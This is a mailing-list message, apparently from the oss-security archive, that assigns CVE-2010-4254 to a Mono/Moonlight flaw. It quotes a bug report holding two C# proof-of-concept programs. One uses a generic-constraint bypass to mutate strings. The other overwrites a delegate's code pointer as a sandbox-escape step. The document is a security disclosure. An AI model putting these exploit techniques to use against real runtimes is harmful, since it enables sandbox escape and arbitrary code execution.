Follow @Openwall on Twitter for new release announcements and other news
[<prev] [next>] [<thread-prev] [day] [month] [year] [list]
Message-ID: <1544809689.736861291062980367.JavaMail.root@zmail01.collab.prod.int.phx2.redhat.com>
Date: Mon, 29 Nov 2010 15:36:20 -0500 (EST)
From: Josh Bressers <bressers@...hat.com>
To: oss-security@...ts.openwall.com
Cc: coley <coley@...re.org>
Subject: Re: CVE request: mono/moonlight: execution of
 arbitrary code due to mutable Strings

Please use CVE-2010-4254 for this.

Thanks.

-- 
    JB


----- "Thomas Biege" <thomas@...e.de> wrote:

> Hello.
> 
> Just a copy-n-paste from our bugzilla (again):
> 
> ------------------------------------------------------------------------------
> SP 2010-11-24 20:45:21 UTC
> 
> Original (pulled by author) blog entry:
> 
> So I was messing around with generic methods and discovered that
> generic
> constraints can be bypassed on Mono 2.6.7 and 2.8 using reflection
> (with the
> exception of the new() constraint). One of the fun results of this bug
> is that
> the String class can be made mutable without using reflection to set
> private
> members!
> 
> The following code demonstrates this; it is legal and will run on Mono
> up to
> and including version 2.8:
> 
> using System;
> using System.Reflection;
> 
> public class FakeString {
>     public int length;
>     public char start_char;
> }
> 
> public class TestCase {
>     private static FakeString UnsafeConversion<T>(T thing)
>         where T : FakeString
>     {
>         return thing;
>     }
> 
>     public static void Main() {
>         var a = "foo";
>         var b = MakeMutable(a);
> 
>         Console.WriteLine(a);
>         b.start_char = 'b';
>         Console.WriteLine(a);
>     }
> 
>     private static FakeString MakeMutable(string s)
>     {
>         var m = typeof(TestCase).GetMethod("UnsafeConversion",
> BindingFlags.NonPublic | BindingFlags.Static);
>         var m2 = m.MakeGenericMethod(typeof(string));
> 
>         var d = (Func<string,
> FakeString>)Delegate.CreateDelegate(typeof(Func<string, FakeString>),
> null,
> m2);
> 
>         return d(s);
>     }
> }
> 
> 
> 
> Comment 1 SP 2010-11-24 20:54:20 UTC
> 
> This is a follow up of the previous
> https://bugzilla.novell.com/show_bug.cgi?id=654136
> 
> The original blog entry allow trusted (by moonlight) code to mutate
> strings
> which could be used to trick policies (e.g. give a valid URL and, once
> 
> accepted
> as a valid xdomain URL, change it to something else).
> 
> It can also be extended to arbitrary code execution. POC by Geoff
> Norton: 
> 
> using System;
> using System.Reflection;
> using System.Runtime.InteropServices;
> 
> public class DelegateWrapper {
>     public IntPtr method_ptr;
> }
> 
> public delegate void MethodWrapper ();
> 
> public class BreakSandbox {
>     private static DelegateWrapper Convert <T> (T dingus) where T :
> DelegateWrapper {
>         return dingus;
>     }
> 
>     private static DelegateWrapper ConvertDelegate (Delegate del) {
>         var m = typeof (BreakSandbox).GetMethod ("Convert",
> BindingFlags.NonPublic | BindingFlags.Static);
>         var gm = m.MakeGenericMethod (typeof (Delegate));
> 
>         var d = (Func <Delegate, DelegateWrapper>)
> Delegate.CreateDelegate
> (typeof (Func <Delegate, DelegateWrapper>), null, gm);
> 
>         return d (del);
>     }
> 
>     public static void Main (string [] args) {
>         MethodWrapper d = delegate {
>             Console.WriteLine ("Hello");
>         };
> 
>         d ();
>         var converted = ConvertDelegate (d);
>         // Overwrite the already WX page with a 'ret'
>         Marshal.WriteByte (converted.method_ptr, (byte) 0xc3);
>         d ();
>     }
> }
> 
> This code won't execute on Moonlight (since all Marshal.* code is
> SecurityCritical) but it would not be hard to modify the POC to do the
> same
> without SecurityCritical code.
> 
> Note: the bug is present in Mono but does not represent a security
> vulnerability there since Mono (unlike Moonlight) can only execute
> trusted
> code.
> 
> [reply] [-]
> Private
> Comment 2 
> ------------------------------------------------------------------------------
> 
> -- 
>  Thomas Biege <thomas@...e.de>, SUSE LINUX, Security Support &
> Auditing
>  SUSE LINUX Products GmbH, GF: Markus Rex, HRB 16746 (AG Nuernberg)
> --
>   Wer aufhoert besser werden zu wollen, hoert auf gut zu sein.
>                             -- Marie von Ebner-Eschenbach

Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.